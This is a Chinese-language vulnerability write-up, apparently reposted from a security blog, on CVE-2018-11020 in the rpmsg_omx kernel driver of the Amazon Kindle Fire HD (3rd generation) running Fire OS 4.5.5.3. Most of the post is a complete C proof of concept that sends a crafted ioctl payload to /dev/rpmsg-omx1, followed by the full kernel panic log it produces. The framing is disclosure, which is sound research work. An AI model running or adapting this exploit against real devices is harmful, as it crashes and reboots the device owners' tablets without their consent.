(CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

admin 2022年1月6日00:42:39评论42 views字数 17292阅读57分38秒阅读模式

一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3内核组件中的内核模块/omap/drivers/rpmsg/rpmsg_omx.c允许攻击者通过设备文件/ dev / rpmsg-上的ioctl的参数注入特制的参数使用命令3221772291的omx1,并导致内核崩溃。

要探索此漏洞,必须打开设备文件/ dev / rpmsg-omx1,并使用命令3221772291和精心设计的有效负载作为第三个参数来对该设备文件进行ioctl系统调用。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
/*
* This is poc of Kindle Fire HD 3rd
* A bug in the ioctl interface of device file /dev/rpmsg-omx1 causes the system crash via IOCTL 3221772291.
* Related buggy struct name is gcicommit.
* This Poc should run with permission to do ioctl on /dev/rpmsg-omx1.
*
* The fowllwing is kmsg of kernel crash infomation:
*
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/rpmsg-omx1";
static command = 3221772291;

int main(int argc, char **argv, char **env) {
unsigned int payload[] = { 0xb5d18de2, 0xf6e48a17, 0x9179c429, 0x89a32e03 };

int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %d\n", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}

printf("Try open %s with command 0x%x.\n", driver, command);
printf("System will crash and reboot.\n");
if(ioctl(fd, command, &payload) < 0) {
printf("Allocation of structs failed, %d\n", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}

崩溃日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
[  146.290710] Unable to handle kernel paging request at virtual address b5d18de6
[ 146.299438] pgd = d72dc000
[ 146.302795] [b5d18de6] *pgd=00000000
[ 146.307281] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[ 146.313232] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[ 146.320983] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[ 146.328308] PC is at ion_free+0xc/0xb4
[ 146.332672] LR is at rpmsg_omx_ioctl+0x2cc/0x598
[ 146.337890] pc : [<c02e8540>] lr : [<c048a120>] psr: 60000013
[ 146.337890] sp : c35b5e60 ip : c35b5e80 fp : c35b5e7c
[ 146.350860] r10: c35b5ea8 r9 : de88c4d8 r8 : c35b4000
[ 146.356872] r7 : dd32b580 r6 : 00000003 r5 : d71d5880 r4 : be92f5f8
[ 146.364135] r3 : d71d58ec r2 : d71d58ec r1 : b5d18de2 r0 : d7aaaa00
[ 146.371551] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 146.379516] Control: 10c5387d Table: 972dc04a DAC: 00000015
[ 146.386077]
[ 146.386077] PC: 0xc02e84c0:
[ 146.391052] 84c0 0a000001 e2871010 ebfddc25 e1a00006 eb0ee904 e5953058 e2433001 e5853058
[ 146.401580] 84e0 e3530000 ba000011 1a000009 e1a0200d e3c23d7f e3c3303f e285005c e593300c
[ 146.412292] 8500 e593723c e1a01007 ebf90a76 e597321c e585306c e1a00006 eb0ee876 e1a00005
[ 146.422821] 8520 ebffffb4 e1a00004 ebf8e011 e89da8f0 e7f001f2 e1a0c00d e92dd878 e24cb004
[ 146.433502] 8540 e5915004 e1a04001 e1550000 1a000021 e2856014 e1a00006 eb0ee8e2 e5953010
[ 146.444183] 8560 e3530000 0a000005 e243200c e1540002 2a00000a e5933008 e3530000 1afffff9
[ 146.454864] 8580 e59f0054 e3001219 e59f2050 e59f3050 ebf58268 e1a00006 eb0ee856 e89da878
[ 146.465393] 85a0 85933004 8affffed f57ff05f e1943f9f e2433001 e1842f93 e3320000 1afffffa
[ 146.476074]
[ 146.476074] LR: 0xc048a0a0:
[ 146.481048] a0a0 33a03000 e3530000 1affffae e24ba05c e1a01004 e3a02008 e1a0000a ebf7305e
[ 146.491729] a0c0 e3500000 1affffaa e5950068 e51b1058 ebf97677 e3500000 e50b005c 0a000001
[ 146.502380] a0e0 e3700a01 9affffc8 e3a03000 e50b305c eaffffc5 e3e00018 eaffff8e e1a00004
[ 146.513061] a100 e1a0100a e3a02008 ebf73154 e3500000 0affff88 eaffffc2 e5950068 ebf97904
[ 146.523590] a120 eaffffb9 e24b005c e3a01030 ebf7398b e3a02030 e597003c e1a03006 e58d2000
[ 146.534240] a140 e59f1280 e59f2274 ebf99069 e3e0000d eaffff78 e5933004 e7933101 e3530000
[ 146.544921] a160 0affff6c e5950068 ebf97651 e2509000 0a000021 e3790a01 8a00001f e5950068
[ 146.555603] a180 e1a01009 e24b2064 e24b3060 ebf97447 e3500000 050b905c 0affff9b e59f322c
[ 146.566131]
[ 146.566131] SP: 0xc35b5de0:
[ 146.571228] 5de0 00000004 d8cc50f4 60010013 00000001 00000001 c02e8540 60000013 ffffffff
[ 146.581787] 5e00 c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00 b5d18de2
[ 146.592437] 5e20 d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8
[ 146.603118] 5e40 c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff
[ 146.613830] 5e60 d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[ 146.624389] 5e80 c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[ 146.635070] 5ea0 c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[ 146.645599] 5ec0 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[ 146.656158]
[ 146.656158] IP: 0xc35b5e00:
[ 146.661254] 5e00 c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00 b5d18de2
[ 146.671936] 5e20 d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8
[ 146.682495] 5e40 c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff
[ 146.693176] 5e60 d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[ 146.703704] 5e80 c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[ 146.714263] 5ea0 c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[ 146.724914] 5ec0 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[ 146.735595] 5ee0 d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08
[ 146.746276]
[ 146.746276] FP: 0xc35b5dfc:
[ 146.751251] 5dfc ffffffff c35b5e4c c35b4000 c35b5e7c c35b5e18 c06a5318 c0008370 d7aaaa00
[ 146.761779] 5e1c b5d18de2 d71d58ec d71d58ec be92f5f8 d71d5880 00000003 dd32b580 c35b4000
[ 146.772308] 5e3c de88c4d8 c35b5ea8 c35b5e7c c35b5e80 c35b5e60 c048a120 c02e8540 60000013
[ 146.783020] 5e5c ffffffff d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120
[ 146.793701] 5e7c c02e8540 c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4
[ 146.804382] 5e9c c35b5ea8 c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000
[ 146.814941] 5ebc c35b5f14 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc
[ 146.825592] 5edc 00000000 d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74
[ 146.836242]
[ 146.836242] R0: 0xd7aaa980:
[ 146.841217] a980 00000001 00000001 00000000 00000000 00004007 00000000 00000000 00000000
[ 146.851898] a9a0 00000020 00000000 00000000 00000000 00000300 d7aaa9b4 d7aaa9b4 c0248d00
[ 146.862518] a9c0 00000093 00000093 0000005d 00000002 00000000 00000000 00000000 00000000
[ 146.873077] a9e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 146.883728] aa00 d763b780 00000000 00000000 deabb480 00000000 00000001 00000000 00000000
[ 146.894409] aa20 d7aaaa20 d7aaaa20 00000000 00000105 c0903054 d7157440 00000f30 dcd4f220
[ 146.905090] aa40 00000093 00000003 00000017 00000000 00000000 00000000 00000000 00000000
[ 146.915618] aa60 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 146.926300]
[ 146.926300] R2: 0xd71d586c:
[ 146.931274] 586c 00000000 00000000 00000000 00000000 00000000 dd32b5c8 dd32b5c8 dd32b580
[ 146.941955] 588c d71d588c d71d588c 00000000 00000000 00000000 00000001 00000000 00000000
[ 146.952636] 58ac d71d58ac d71d58ac 00000000 00000000 00000000 d71d58c0 d71d58c0 00000000
[ 146.963287] 58cc 00000000 00000000 d71d58d4 d71d58d4 d7aaadc0 00000000 00000000 d7aaaa00
[ 146.973815] 58ec d71d58ec d71d58ec 00000000 00000000 00000000 00006a44 d71d5904 d71d5904
[ 146.984497] 590c 00000003 d7138510 d725b910 00000000 00000000 d6cf989c 00000001 00000000
[ 146.995147] 592c 00000000 6149b660 6149b640 00001fe5 d71d593c d71d593c 00000000 00000000
[ 147.005676] 594c 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 147.016357]
[ 147.016357] R3: 0xd71d586c:
[ 147.021453] 586c 00000000 00000000 00000000 00000000 00000000 dd32b5c8 dd32b5c8 dd32b580
[ 147.032012] 588c d71d588c d71d588c 00000000 00000000 00000000 00000001 00000000 00000000
[ 147.042663] 58ac d71d58ac d71d58ac 00000000 00000000 00000000 d71d58c0 d71d58c0 00000000
[ 147.053314] 58cc 00000000 00000000 d71d58d4 d71d58d4 d7aaadc0 00000000 00000000 d7aaaa00
[ 147.063873] 58ec d71d58ec d71d58ec 00000000 00000000 00000000 00006a44 d71d5904 d71d5904
[ 147.074523] 590c 00000003 d7138510 d725b910 00000000 00000000 d6cf989c 00000001 00000000
[ 147.085205] 592c 00000000 6149b660 6149b640 00001fe5 d71d593c d71d593c 00000000 00000000
[ 147.095886] 594c 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 147.106414]
[ 147.106445] R5: 0xd71d5800:
[ 147.111541] 5800 d71d5d00 00000000 00000000 dcfc4200 f0000009 00000211 00000001 00000001
[ 147.122070] 5820 00000000 00001000 00001000 00000004 00000000 d71d5844 c01519dc d89b54c0
[ 147.132751] 5840 c01576ac c10dc870 00001000 00000000 c0a10230 c0a10dc0 d1a1dd58 c006f724
[ 147.143432] 5860 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 147.154083] 5880 dd32b5c8 dd32b5c8 dd32b580 d71d588c d71d588c 00000000 00000000 00000000
[ 147.164611] 58a0 00000001 00000000 00000000 d71d58ac d71d58ac 00000000 00000000 00000000
[ 147.175140] 58c0 d71d58c0 d71d58c0 00000000 00000000 00000000 d71d58d4 d71d58d4 d7aaadc0
[ 147.185821] 58e0 00000000 00000000 d7aaaa00 d71d58ec d71d58ec 00000000 00000000 00000000
[ 147.196472]
[ 147.196502] R7: 0xdd32b500:
[ 147.201446] b500 e2401000 f400f000 0202420f 0000c000 f400f000 dd071d20 00000000 d8f0a680
[ 147.212127] b520 d8f0a740 00000000 00000000 00000001 00000000 00000000 00000000 00000000
[ 147.222656] b540 00000000 00000000 00000001 00000000 00000000 00000000 00000000 00000000
[ 147.233184] b560 00000000 00000000 c153f430 00001000 00000000 00000000 00000000 00000000
[ 147.243865] b580 00000000 dd32b584 dd32b584 00000000 00000000 c0a16c60 00000000 00000002
[ 147.254547] b5a0 00000001 00000000 c06faab0 de88c61c de88c61c 0f700001 00000001 d8caa000
[ 147.265075] b5c0 dd0f7200 00000001 d71d5880 d71d5880 00000001 00000000 00000000 dd32b5dc
[ 147.275756] b5e0 dd32b5dc 00000000 7fffffff 00000000 00000000 dd32b5f4 dd32b5f4 00000000
[ 147.286407]
[ 147.286407] R8: 0xc35b3f80:
[ 147.291381] 3f80 66eff968 00000000 000000f0 c0013e08 c35b2000 00000000 00000000 c35b3fa8
[ 147.302032] 3fa0 c0013c60 c009a164 66eff978 66eff968 66eff978 00000080 00000000 00000000
[ 147.312713] 3fc0 66eff978 66eff968 00000000 000000f0 00000000 00000000 00000000 41d1f6a8
[ 147.323272] 3fe0 00000000 6716ebc8 400710f8 40083b80 600f0010 66eff978 00760061 00000061
[ 147.333923] 4000 00000000 00000002 00000000 d7157440 c0a0e840 00000000 00000015 d726ee00
[ 147.344604] 4020 d8d2c700 c35b4000 c09ddc50 d7157440 d8db57c0 c1617b40 c35b5b4c c35b5a98
[ 147.355133] 4040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[ 147.365814] 4060 0087d4c0 5ebfe27f 00000000 00000000 00000000 00000000 00000000 00000000
[ 147.376464]
[ 147.376495] R9: 0xde88c458:
[ 147.381469] c458 de88c458 de88c458 00000000 00000000 00000000 c06bc674 000200da c09dda58
[ 147.392150] c478 00000000 00000000 de88c480 de88c480 00000000 de88c48c de88c48c 00000000
[ 147.402801] c498 5aefcde6 00000000 00000000 00000000 de88c4b0 28cfd730 00000000 00000000
[ 147.413330] c4b8 00200000 00000000 00000000 de88c4c4 de88c4c4 d8cbdf00 d8cbdf00 00000000
[ 147.424011] c4d8 000521b0 00000402 00000402 00000000 00000000 00000000 c06b9600 dd160400
[ 147.434661] c4f8 de88c5b0 d8c81030 00000f98 00000001 0f700001 5aefcde6 199c82ca 5aefcde6
[ 147.445312] c518 199c82ca 5aefcde6 199c82ca 00000000 00000000 00000000 00000000 00000000
[ 147.455871] c538 00000000 00000000 00000000 00000000 00000001 00000000 00000000 de88c554
[ 147.466522]
[ 147.466522] R10: 0xc35b5e28:
[ 147.471588] 5e28 be92f5f8 d71d5880 00000003 dd32b580 c35b4000 de88c4d8 c35b5ea8 c35b5e7c
[ 147.482269] 5e48 c35b5e80 c35b5e60 c048a120 c02e8540 60000013 ffffffff d71d58ec be92f5f8
[ 147.492950] 5e68 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540 c35b5edc c35b5e90
[ 147.503631] 5e88 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8 c00723a0 000fffff
[ 147.514160] 5ea8 b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14 00000000 00000001
[ 147.524688] 5ec8 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000 d72400c0 00000004
[ 147.535339] 5ee8 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08 c0136044 c0489e60
[ 147.546020] 5f08 00000000 00000000 00000000 00000001 00000000 dd055190 dd5e7f68 c35b5f0c
[ 147.556579] Process rpmsg_omx_ioctl (pid: 3888, stack limit = 0xc35b42f8)
[ 147.564270] Stack: (0xc35b5e60 to 0xc35b6000)
[ 147.569213] 5e60: d71d58ec be92f5f8 d71d5880 00000003 c35b5f04 c35b5e80 c048a120 c02e8540
[ 147.578430] 5e80: c35b5edc c35b5e90 c0207454 c00bd920 0000001e d7333e40 c35b5ed4 c35b5ea8
[ 147.587646] 5ea0: c00723a0 000fffff b5d18de2 f6e48a17 00000002 00000001 00000000 c35b5f14
[ 147.596740] 5ec0: 00000000 00000001 de88c4d8 c25d7c00 c35b5efc c35b5ee0 c02089fc 00000000
[ 147.605957] 5ee0: d72400c0 00000004 d72400c0 be92f5f8 de88c4d8 00000000 c35b5f74 c35b5f08
[ 147.615173] 5f00: c0136044 c0489e60 00000000 00000000 00000000 00000001 00000000 dd055190
[ 147.624389] 5f20: dd5e7f68 c35b5f0c c35b4000 be92f628 be92f5f8 c0085803 d72400c0 00000004
[ 147.633483] 5f40: c35b4000 00000000 c35b5f64 00000000 be92f5f8 c0085803 d72400c0 00000004
[ 147.642730] 5f60: c35b4000 00000000 c35b5fa4 c35b5f78 c01365e0 c0135fc4 00000000 00000000
[ 147.651947] 5f80: 00000400 be92f628 00010e54 00000000 00000036 c0013e08 00000000 c35b5fa8
[ 147.661010] 5fa0: c0013c60 c0136578 be92f628 00010e54 00000004 c0085803 be92f5f8 be92f5f8
[ 147.670104] 5fc0: be92f628 00010e54 00000000 00000036 00000000 00000000 00000000 be92f614
[ 147.679321] 5fe0: 00000000 be92f5dc 00010690 0002917c 60000010 00000004 00000017 579e6e78
[ 147.688537] Backtrace:
[ 147.691558] [<c02e8534>] (ion_free+0x0/0xb4) from [<c048a120>] (rpmsg_omx_ioctl+0x2cc/0x598)
[ 147.701049] r6:00000003 r5:d71d5880 r4:be92f5f8 r3:d71d58ec
[ 147.708068] [<c0489e54>] (rpmsg_omx_ioctl+0x0/0x598) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[ 147.717956] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[ 147.727203] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 147.736450] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e54 r4:be92f628
[ 147.744873] Code: e7f001f2 e1a0c00d e92dd878 e24cb004 (e5915004)
[ 147.754913] Board Information:
[ 147.754913] Revision : 0001
[ 147.754943] Serial : 0000000000000000
[ 147.754943] SoC Information:
[ 147.754943] CPU : OMAP4470
[ 147.754943] Rev : ES1.0
[ 147.754974] Type : HS
[ 147.754974] Production ID: 0002B975-000000CC
[ 147.754974] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[ 147.755004]
[ 147.794616] ---[ end trace 50912198cfc81720 ]---
[ 147.799957] Kernel panic - not syncing: Fatal exception
[ 147.805847] CPU0: stopping
[ 147.808959] Backtrace:
[ 147.812133] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[ 147.821502] r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
[ 147.828643] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[ 147.837860] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[ 147.847259] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[ 147.856567] Exception stack(0xdd187b38 to 0xdd187b80)
[ 147.862243] 7b20: 00000002 00000002
[ 147.871459] 7b40: 00000002 00000001 dd187bbc c1621100 c1621100 00c6a000 c1621108 00000001
[ 147.880676] 7b60: 00000001 dd187bac 00000002 dd187b80 c002398c c009ae48 200d0013 ffffffff
[ 147.889892] r6:ffffffff r5:200d0013 r4:c009ae48 r3:c002398c
[ 147.896911] [<c009add0>] (generic_exec_single+0x0/0x98) from [<c009af78>] (smp_call_function_single+0x110/0x1e0)
[ 147.908325] [<c009ae68>] (smp_call_function_single+0x0/0x1e0) from [<c009b28c>] (smp_call_function_many+0x244/0x294)
[ 147.920104] [<c009b048>] (smp_call_function_many+0x0/0x294) from [<c009b48c>] (smp_call_function+0x48/0x74)
[ 147.931030] [<c009b444>] (smp_call_function+0x0/0x74) from [<c04310f4>] (cpuidle_latency_notify+0x20/0x28)
[ 147.941864] r4:ffffffff r3:c04310d4
[ 147.946258] [<c04310d4>] (cpuidle_latency_notify+0x0/0x28) from [<c06a7154>] (notifier_call_chain+0x4c/0x8c)
[ 147.957305] [<c06a7108>] (notifier_call_chain+0x0/0x8c) from [<c006ebc0>] (__blocking_notifier_call_chain+0x50/0x68)
[ 147.969085] r8:200d0013 r7:000000a0 r6:00000000 r5:ffffffff r4:c0a11df8
[ 147.977020] r3:ffffffff
[ 147.980499] [<c006eb70>] (__blocking_notifier_call_chain+0x0/0x68) from [<c006ebf8>] (blocking_notifier_call_chain+0x20/0x28)
[ 147.993133] r7:de95183c r6:000000a0 r5:0000115c r4:c0a11d98
[ 148.000152] [<c006ebd8>] (blocking_notifier_call_chain+0x0/0x28) from [<c0088eec>] (pm_qos_update_target+0xf8/0x19c)
[ 148.011932] [<c0088df4>] (pm_qos_update_target+0x0/0x19c) from [<c008909c>] (pm_qos_update_request+0x5c/0x8c)
[ 148.023071] [<c0089040>] (pm_qos_update_request+0x0/0x8c) from [<c0411b18>] (omap_i2c_xfer+0x2bc/0x6c8)
[ 148.033599] r5:dd187da0 r4:00000000
[ 148.038024] [<c041185c>] (omap_i2c_xfer+0x0/0x6c8) from [<c040e5cc>] (i2c_transfer+0xb8/0xf8)
[ 148.047637] [<c040e514>] (i2c_transfer+0x0/0xf8) from [<c040e930>] (i2c_smbus_xfer+0x278/0x588)
[ 148.057434] [<c040e6b8>] (i2c_smbus_xfer+0x0/0x588) from [<c040eedc>] (i2c_smbus_read_word_data+0x3c/0x4c)
[ 148.068267] [<c040eea0>] (i2c_smbus_read_word_data+0x0/0x4c) from [<c0418760>] (bq27541_i2c_read.constprop.7+0x20/0x54)
[ 148.080200] [<c0418740>] (bq27541_i2c_read.constprop.7+0x0/0x54) from [<c04189f0>] (battery_handle_work+0x120/0x6a4)
[ 148.091857] r5:dd187e92 r4:dd08b920
[ 148.096374] [<c04188d0>] (battery_handle_work+0x0/0x6a4) from [<c0063278>] (process_one_work+0x150/0x468)
[ 148.107116] [<c0063128>] (process_one_work+0x0/0x468) from [<c00638c4>] (worker_thread+0x13c/0x320)
[ 148.117156] [<c0063788>] (worker_thread+0x0/0x320) from [<c0068af4>] (kthread+0x90/0x9c)
[ 148.126312] [<c0068a64>] (kthread+0x0/0x9c) from [<c004cd64>] (do_exit+0x0/0x7e0)
[ 148.134765] r6:c004cd64 r5:c0068a64 r4:dd0aded4
[ 148.140533] CPU0 PC (0) : 0xc0019b2c
[ 148.144714] CPU0 PC (1) : 0xc0019b2c
[ 148.148773] CPU0 PC (2) : 0xc0019b2c
[ 148.152832] CPU0 PC (3) : 0xc0019b2c
[ 148.156890] CPU0 PC (4) : 0xc0019b2c
[ 148.161071] CPU0 PC (5) : 0xc0019b2c
[ 148.165130] CPU0 PC (6) : 0xc0019b2c
[ 148.169189] CPU0 PC (7) : 0xc0019b2c
[ 148.173370] CPU0 PC (8) : 0xc0019b2c
[ 148.177429] CPU0 PC (9) : 0xc0019b2c
[ 148.181488] CPU1 PC (0) : 0xc003ee38
[ 148.185668] CPU1 PC (1) : 0xc003ee54
[ 148.189727] CPU1 PC (2) : 0xc003ee54
[ 148.193786] CPU1 PC (3) : 0xc003ee54
[ 148.197967] CPU1 PC (4) : 0xc003ee54
[ 148.202026] CPU1 PC (5) : 0xc003ee54
[ 148.206085] CPU1 PC (6) : 0xc003ee54
[ 148.210266] CPU1 PC (7) : 0xc003ee54
[ 148.214324] CPU1 PC (8) : 0xc003ee54
[ 148.218383] CPU1 PC (9) : 0xc003ee54
[ 148.222442]
[ 148.224365] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[ 148.224365]

FROM :ol4three.com | Author:ol4three

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日00:42:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2018-11020)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞http://cn-sec.com/archives/720860.html

发表评论

匿名网友 填写信息